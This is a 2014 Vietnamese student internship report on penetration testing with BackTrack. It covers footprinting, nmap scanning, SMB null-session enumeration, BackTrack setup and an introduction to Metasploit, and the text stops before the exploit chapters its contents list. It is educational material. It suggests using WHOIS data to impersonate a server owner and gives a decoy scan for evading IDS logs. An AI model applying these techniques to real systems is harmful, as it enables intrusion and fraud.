37
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Đề tài: Nghiên cứu và sử dụng các chức năng của backtrack để kiểm tra an ninh mạng GVHD: Thầy VÕ ĐỖ THẮNG Sinh viên thực hiện: Phạm Minh Đạt – 51100753 Dương Thế Hiển - 51101153 Thành phHChí Minh, ngày 11 tháng 08 năm 2014

Báo cáo cuối kỳ Athena - Report

Embed Size (px)

DESCRIPTION

Báo cáo cuối kỳ thực tập công nghiệp 2, Athena

Citation preview

Page 1: Báo cáo cuối kỳ Athena - Report

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA

KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ

ATHENA

BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Đề tài: Nghiên cứu và sử dụng các chức năng của backtrack để kiểm tra an ninh mạng

GVHD: Thầy VÕ ĐỖ THẮNG

Sinh viên thực hiện:

Phạm Minh Đạt – 51100753

Dương Thế Hiển - 51101153

Thành phố Hồ Chí Minh, ngày 11 tháng 08 năm 2014

Page 2: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 1

NỘI DUNG BÀI BÁO CÁO LỜI CAM ĐOAN.................................................................................................................................................................................................................................... 2

LỜI CẢM ƠN TRUNG TÂM .............................................................................................................................................................................................................. 3

LỜI CẢM ƠN KHOA ............................................................................................................................................................................................................................ 4

LỜI MỞ ĐẦU ......................................................................................................................................................................................................................................... 5

NHẬN XÉT CỦA CÔNG TY THỰC TẬP ....................................................................................................................................................................................... 6

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ............................................................................................................................................................................... 7

GIỚI THIÊU VỀ CÔNG TY THỰC TẬP ......................................................................................................................................................................................... 8

Các cơ sở ............................................................................................................................................................................................................................................ 8

Cơ sở 1: Tại TP Hồ Chí Minh: ................................................................................................................................................................................................ 8

Cơ sở 2: Tại TP Hồ Chí Minh: ................................................................................................................................................................................................ 8

Lĩnh vực hoạt động ........................................................................................................................................................................................................................ 8

Đội ngũ giảng viên ......................................................................................................................................................................................................................... 9

NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP ......................................................................................................................................................10

Footprinting ...................................................................................................................................................................................................................................10

Cở sở lý thuyết ..........................................................................................................................................................................................................................10

Cách thực hiện ...........................................................................................................................................................................................................................10

Network Scanning .......................................................................................................................................................................................................................12

Cơ sở lý thuyết ..........................................................................................................................................................................................................................12

Cách thực hiện ...........................................................................................................................................................................................................................13

Enumeration ..................................................................................................................................................................................................................................13

Cơ sở lý thuyết ..........................................................................................................................................................................................................................13

Cách thực hiện ...........................................................................................................................................................................................................................13

Giới thiệu VMWare Workstation...........................................................................................................................................................................................15

Hệ điều hành BackTrack5 R3 .................................................................................................................................................................................................15

Giới thiệu Backtrack5 R3 ......................................................................................................................................................................................................15

Cài đặt Backtrack5 R3 trên VMWare ..............................................................................................................................................................................16

Công cụ Metasploit ......................................................................................................................................................................................................................22

Giới thiệu Metasploit ..............................................................................................................................................................................................................22

Các thành phần của Metasploit ..........................................................................................................................................................................................22

Sử dụng Metasploit framework .........................................................................................................................................................................................22

Payload meterpreter ..............................................................................................................................................................................................................23

Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost ..........................................................................................................................24

Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7 ..............................................................................................................24

Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010 .........................................................................................................................................28

Khai thác lỗi của Adobe Reader .........................................................................................................................................................................................29

Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP ...............................................................................................................32

Tấn công qua mạng Internet, triển khai trên VPS .........................................................................................................................................................34

VPS là gì ........................................................................................................................................................................................................................................34

Đặc điểm VPS .............................................................................................................................................................................................................................34

Giá trị sử dụng của VPS .........................................................................................................................................................................................................34

Khai thác thông qua VPS .......................................................................................................................................................................................................34

KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP ...........................................................................................................................................................35

TÀI LIỆU THAM KHẢO ...................................................................................................................................................................................................................36

Page 3: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 2 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

LỜI CAM ĐOAN Tôi xin cam đoan:

Những nội dung trong bài báo cáo này là do tôi thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng.

Mọi tham khảo trong báo cáo này đều được trích dẫn rõ ràng tác giả, tên công trình, thời gian, địa điểm công

bố.

Mọi sao chép không hợp lệ, vi phạm qui chế đào tạo, hay gian lận nhóm xin hoàn toàn chịu trách nhiệm.

Các bài báo cáo hàng tuần và các video clip:

Dương Thế Hiển – 51101153

Tuần 1:

http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-1

https://www.youtube.com/watch?v=yPISuQIlOpM

Tuần 2:

http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-2

https://www.youtube.com/watch?v=_7GrYn_zqtI&feature=youtu.be

Tuần 3:

http://www.slideshare.net/duongthehien1109/duong-the-hien-hbkttcn2-bo-co-tun-3

https://www.youtube.com/watch?v=gJdtkKWmTuc

Clip giới thiệu cá nhân

https://www.youtube.com/watch?v=R02WiuE_tEI&feature=youtu.be

Phạm Minh Đạt – 51100753

Clip giới thiệu và các bài báo cáo

http://tinyurl.com/baocaoathena

Video clip cuối kỳ

https://www.youtube.com/watch?v=eMblYurER_Q

TPHCM ngày 11 tháng 08 năm 2014

Nhóm sinh viên thực hiện

Phạm Minh Đạt

Dương Thế Hiển

Page 4: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 3

LỜI CẢM ƠN TRUNG TÂM

Tôi xin cảm ơn giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena, cùng các anh chị trong công ty. Đặc biệt, tôi xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn tôi trong suốt thời gian TTCN2. Đã tạo điều kiện cũng như kiến thức trong suốt thời thời gian thực tập, đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo.

Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ thực tập sắp tới.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM ngày 11 tháng 08 năm 2014

Nhóm sinh viên thực hiện

Phạm Minh Đạt

Dương Thế Hiển

Page 5: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 4 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

LỜI CẢM ƠN KHOA

Tôi xin chân thành cảm ơn trường Đại Học Bách Khoa tp.HCM và khoa Khoa Học và Kỹ Thuật Máy Tính đã tạo điều kiện cho tôi hoàn thành tốt đợt TTCN 2 này. Trong đợt thực tập này đã cho tôi những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp tôi hoàn thiện hơn trong công việc và môi trường làm việc sau này.

Mặc dù tôi và nhóm đã cố gắng hoàn thành báo cáo thực tập tốt nghiệp với tất cả nỗ lực của bản thân. Nhưng chắc chắn sẽ vần còn sai sót. Nhóm rất mong được sự đóng góp, chia sẻ để nhóm có thể làm tốt hơn nữa trong các kỳ thực tập sắp tới.

Một lần nữa tôi xin chân thành cảm ơn.

TPHCM ngày 11 tháng 08 năm 2014

Nhóm sinh viên thực hiện

Phạm Minh Đạt

Dương Thế Hiển

Page 6: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 5

LỜI MỞ ĐẦU

Theo xu hướng phát triển như hiện nay, máy tính cũng như thiết bị thông minh phát triển ngày càng mạnh trên nền hệ thống mạng Internet. Thế nên, vấn đề bảo mật thông tin, an ninh mạng càng được chú trọng nhiều hơn. Hiện nay, các giao dịch ngân hàng, mua bán qua mạng được thực hiện hàng ngày, hàng giờ thông qua Internet, và các tài khoản ngân hàng là mục tiêu được các tin tặc nhắm đến. Tuy nhiên, vẫn ít có cá nhân hoặc doanh nghiệp nào chủ động phòng tránh việc này.

Đó là lý do nhóm quyết định tham gia nghiên cứu đề tài này – “Nghiên cứu và sử dụng các công cụ của

BackTrack để nghiên cứu an ninh mạng” – để có thể chủ động phòng tránh những khai thác đến từ tin tặc và có thể

giúp đỡ người khác, các doanh nghiệp chủ động phòng tránh trước các nguy cơ mất mác do tin tặc gây ra.

TPHCM ngày 11 tháng 08 năm 2014

Nhóm sinh viên thực hiện

Phạm Minh Đạt

Dương Thế Hiển

Page 7: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 6 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

NHẬN XÉT CỦA CÔNG TY THỰC TẬP ..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

TPHCM, ngày …. tháng … năm 20..

Giám đốc trung tâm

Page 8: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 7

NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

..................................................................................................................................................................................................................

TPHCM ngày …. tháng …… năm 20…

Giáo viên hướng dẫn

Page 9: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 8 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

GIỚI THIÊU VỀ CÔNG TY THỰC TẬPi

Các cơ sở

Cơ sở 1: Tại TP Hồ Chí Minh:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA. Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam. Điện thoại: ( 84-8 ) 3824 4041 Hotline: 0943 23 00 99

Cơ sở 2: Tại TP Hồ Chí Minh:

Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA 92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam. Website : www.athena.edu.vn or www.athena.com.vn Điện thoại: ( 84-8 ) 2210 3801 Hotline: 0943 20 00 88

Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà.

Lĩnh vực hoạt động

Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI, CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…

Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…

Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học

Page 10: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 9

Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự,…

Đội ngũ giảng viên

Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước .... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư phạm Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.

Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA.

Page 11: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 10 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

NỘI DUNG CHÍNH CỦA CHƯƠNG TRÌNH THỰC TẬP

PHẦN I: THU THẬP THÔNG TINii

Footprinting

Cở sở lý thuyết

Footprinting là một trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin về mục tiêu nhằm xác

định:

Hệ thống mạng của mục tiêu: Internet, Localnetwork, Wireless, …

Host: IP, OS, …

Owner: chủ sở hữu, location, nhân viên, …

Trong quá trình này hacker chủ yếu sử dụng các phương tiện thông tin công cộng như báo chí, internet để tìm hiểu

các thông tin hợp pháp về mục tiêu.

Footprinting hầu như không thể phát hiện vì đây là hành động hợp pháp.

Passive Footprinting:

o Google Search

o Browse Company Website

o Whois lookup

o Nslookup/Tracert command line

Active Footprinting:

o Physical contact

o Email contact

Cách thực hiện

1. Lấy thông tin cá nhân của người đăng ký webserver tại trang web http://centralops.net/co/

Lấy được các thông tin cá nhân này ta có thể tiến hành các hoạt động mạo danh, lừa đảo chủ webserver để phục vụ

cho việc tấn công webserver.

Page 12: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 11

2. Tìm các subdomain hoặc các domain được host tại webserver này để có thể tấn công thông qua các victim

này thay vì tấn công trực tiếp. Tiến hành tại website http://www.yougetsignal.com/tools/web-sites-on-

web-server/

Page 13: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 12 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

3. Xác định vị trí của webserver thông qua Google Maps để có thể tiếp cận gần hơn về mặt physical.

Nếu như tại hệ thống mạng này có dùng access point ta có thể tấn công vào hệ thống nhờ access point này. Để biết

được thông tin về Access Point lận cận như: kiểu mã hóa, MAC Address, … ta có thể dùng lệnh sau tại command

promt

netsh wlan show networks mode=bssid

BSSID chính là MAC Address của Access Point. Từ MAC Address ta có thể biết được Model của AP, default

password, mức độ bảo mật, …

Authentication: ta có thể áp dụng nhiều biện pháp khác để tiến hành crack password AP này.

Network Scanning

Cơ sở lý thuyết

Network Scanning là quá trình tìm hiểu thông tin về các live host trên mạng để giúp hacker quyết định kiểu tấn công

nào sẽ được dùng dể tấn công vào hệ thống. Trong quá trình tấn công, hacker sẽ tìm hiểu các thông tin về

Host: nếu ping mục tiêu và nhận được echo reply tức là host chắc chắn tồn tại. Nếu port 139, 445 được mở thì

host đang dùng OS Windows Family từ 2000 trở lên.

Network: scan mạng tìm ra các live host làm mục tiêu attack hoặc các NIC hoạt động trong promiscuous mode

để nhận diện các hệ thống IDS, hotneypot, …

Vulnerability Scan: tìm ra các lỗi của OS, Services mà host đang sử dụng.

Điều kiện scanning: có khả năng kết nối tới mục tiêu

Hacker sẽ gửi các gói tin đến mục tiêu và dựa vào các gói tin trả về để phân tích tìm thông tin.

Page 14: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 13

Cách thực hiện

Sử dụng công cụ NMAP (http://nmap.org/) để scan cái port, OS và services trên một host

Dùng lệnh nmap –sS –O –p 1-445 –D 192.168.222.121 192.168.222.129

Trong đó:

o -sS: syn scan

o -O: OS detection

o -p: scan từ port a-b

o -D: giả them IP để tránh log của IDS System

Enumeration

Cơ sở lý thuyết

Enumneration là bước tiếp theo kế tiếp Scanning để xác định các thông tin về host để chuẩn bị cho các bước tiếp

theo, Enumeration sẽ thu thập các thông tin về:

Services Port: tìm các port đang mở cho dịch vụ nào

OS: xác định chính xác hệ điều hành nào.

User/Group xác định các thông tin về username, password,…

Nền tảng của quá trình này là sử dụng dịch vụ CIFS/Server Message Bkock (SMB) là dịch vụ khởi thủy từ IBM và

được phát triển bởi Microsoft. Dịch vụ này nhằm mục đích chia sẻ data trên mạng ngang hang giúp cho các client

trong mạng có thể dễ dàng tiếp cận data đã được chia sẻ. Dịch vụ này sử dụng SMB protocol hoạt động ở tầng

Application trong mô hình OSI. Từ Windows Vista, Microsoft đã chuyển sang dùng SMB 2.0.

Trong quá trình trao đổi SMB theo kiểu client/server sẽ diễn ra quá trình Authentication và xác định các share

resource. Mặc định Windows chấp nhận các user anonymouse trong quá trình authentication này để client có thể dễ

dàng tìm ra các share source. Connection được tạo ra bữa user anonymouse được gọi là Null Connection.

Enumeration sẽ lấy được thông tin vì có thể tạo được Null Connection với mục tiêu.

Từ Windows XP, 2003 mặc định user anonymous không nằm trong group everyone

Cách thực hiện

Page 15: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 14 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

1. Tạo null connection với mục tiêu

2. Tìm username của bằng SID2USER

Thông tin ta thu về được sau bước này chính là SID của account. Chính con số này sẽ cho ta biết rất nhiều thứ. Dựa

vào bảng SID iii để hiểu thông tin mà SID cung cấp.

Nhìn vào kết quả thu được bên trên ta nhận thấy rằng cái SID đều

giống nhau chỉ khác phần RID, phần số cuối cùng. Và dựa vào bảng này

ta có thể tìm được tên của tài khoản Administrator của máy tính.

3. Tìm username của Administrator của máy qua SID2USER

Default Global groups (SidTypeGroup)

Domain Admins S-1-5-21-<number>-<number>-<number>-512

Domain Users S-1-5-21-<number>-<number>-<number>-513

Domain Guest S-1-5-21-<number>-<number>-<number>-514

Non-Default Global Groups (SidTypeAlias)

Example S-1-5-21-<number>-<number>-<number>-n=> 1000

Non-Default Local Groups (SidTypeAlias)

Example S-1-5-21-<number>-<number>-<number>-n=> 1000

Default Accounts (SidTypeUser)

Administrator S-1-5-21-<number>-<number>-<number>-500

Guest S-1-5-21-<number>-<number>-<number>-501

Non-Default User Accounts (SidTypeUser)

jsmith S-1-5-21-<number>-<number>-<number>-n=> 1000

Figure 1: Bảng SID

Page 16: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 15

PHẦN II: SYSTEM HACKING

Giới thiệu VMWare Workstation VMWare Workstation là một hyperviser( ảo hóa phần cứng ) chạy trên các máy tính, cho phép người dùng thiết

lập một hay nhiều máy ảo trên một máy vật lý và cho phép sử dụng đồng thời với máy thực. Mỗi máy ảo có thể thực

thi hệ điều hành của riêng mình, bao gồm các phiên bản Microsoft Windows, Linux, BSD, và MS-DOS. VMWare

Workstation được phát triển bởi VMWare, Inc.

VMWare Workstation hỗ trợ cầu nối adapter mạng tại máy chủ vật lý và chia sẻ các ỗ đĩa và các thiết bị USB với

các máy ảo. Ngoài ra, nó có thể mô phỏng ỗ đĩa. Nó có thể gắn kết một tập tin ảnh ISO vào một ổ đĩa quang ảo để máy

ảo thấy nó như là ỗ đĩa thực. Tương tự, ỗ đĩa cứng ảo được thực hiện thông qua các tập tin .vmdk .

VMWare Workstation có thể lưu trạng thái của một máy ảo bất cứ lúc nào ngay lập tức. Những trạng thái này

có thể được dùng để phục hồi đưa máy ảo về trạng thái đã lưu trước đó.

VMWare Workstation có khả năng chỉ nhiều máy ảo chạy trên nó như là tắt, tạm dừng hoặc tiếp tục, tạo điều

kiện thích hợp để thử nghiệm môi trường client-server.

Hệ điều hành BackTrack5 R3

Giới thiệu Backtrack5 R3

Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong dạng Live DVD có thể sử dụng trực tiếp từ DVD hoặc có thể cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật các cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều phiên bản Linux khác nhau, phiên bản hiện nay đang sử dụng bảng phân phối Slackware Linux và liên tục cập nhật các công cụ, driver qua các phiên bản…Công cụ kiểm thử trong bảo mật có thể được phân loại thành các nhóm như sau:

Information gathering : loại này chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ e-mail. Thông tin này được thu thập từ các thông tin có sẵn trên Internet mà không cần chạm vào mục tiêu.

Network mapping : loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning.

Vulnerability identification : Trong thể loại này bạn có thể tìm thấy các công cụ quét lỗ hổng tổng hợp và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).

Web application analysis : loại này chứa công cụ có thể được sử dụng để theo dõi, giám sát các hoạt động web. Radio network analysis : Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có

thể sử dụng các công cụ trong thể loại này. Penetration : loại này chứa công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính

mục tiêu. Privilege escalation : Sau khi khai thác được các lỗ hổng và truy cập vào được các máy tính mục tiêu, bạn có thể

sử dụng các công cụ loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất. Maintaining access : Công cụ loại này sẽ có thể sẽ giúp bạn trong việc duy trì quyền truy cập vào các máy tính

mục tiêu. Bạn có thể cần những đặc quyền cao nhất trước khi bạn có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP) : Các công cụ để phân tích VOIP. Digital forensics : Phân tích hình ảnh đĩa cứng cấu trúc các tập tin có thể chọn Start Backtrack Forensics trong

trình đơn khởi động. Reverse engineering : Gỡ rối chương trình hoặc tháo rời các tập tin thực thi.

Page 17: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 16 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Cài đặt Backtrack5 R3 trên VMWare

Tại giao diện chính của VMWare Workstation chọn File -> New Virtual Machine

Ta chọn Next để qua bước kế tiếp

Tiếp theo ta sẽ chọn phiên bản của hệ điều hành và đặt tên cho máy Backtrack. Ở đây tôi đặt tên máy là Backtrack5

R3

Page 18: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 17

Nhấn Next để qua bước kế tiếp, trong phần disk size ta sẽ chọn 20 GB.

Tiếp theo ta chọn Next -> Finish.

Page 19: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 18 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Đầu tiên ta sẽ dẫn file .ISO cài đặt Backtrack5 R3

Tiếp theo ta bấm Power on this virtual machine để khởi động quá trình cài đặt. Và đợi quá trình cài đặt hoàn tất.

Để vào Desktop của Backtrack ta dùng lệnh : startx

Page 20: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 19

Để hoàn tất cài đặt Backtrack5 R3 ta nhấn : Install BackTrack trên màn hình Desktop

Tiếp theo ta sẽ thiết lập một số options để quá trình cài đặt được bắt đầu.

Page 21: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 20 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Page 22: Báo cáo cuối kỳ Athena - Report

TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA

Chương trình thực tập công nghiệp 2 Trang 21

Quá trình cài đặt sẽ mất một khoảng thời gian.

Đến đây thì quá trình cài đặt đã kết thúc, chúng ta bấm Restart Now để khởi động lại máy.

Chúng ta đăng nhập với tên là root, password là toor. Gõ startx để vào Desktop của Backtrack.

Page 23: Báo cáo cuối kỳ Athena - Report

GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng

Trang 22 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển

Công cụ Metasploit

Giới thiệu Metasploit

Metasploit Framework là môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành Windows, Linux, MacOS.

Các thành phần của Metasploit

Cosole interface : dùng msfconsole.bat . Msfconsole interface sử dụng được các dòng lệnh cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.

Web interface : dùng msfweb.bat giao tiếp với người dùng thông qua giao diện web. Command line interface : dùng msfcli.bat . Môi trường :

Global Enviroment : được thực thi thông qua 2 câu lệnh setg và unsetg, những options này được gán ở đây sẽ mang tính toàn cục, được đưa tất cả vào trong module exploits.

Temporary Enviroment : được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploits hiện tại và không ảnh hưởng đến các modul exploits khác.

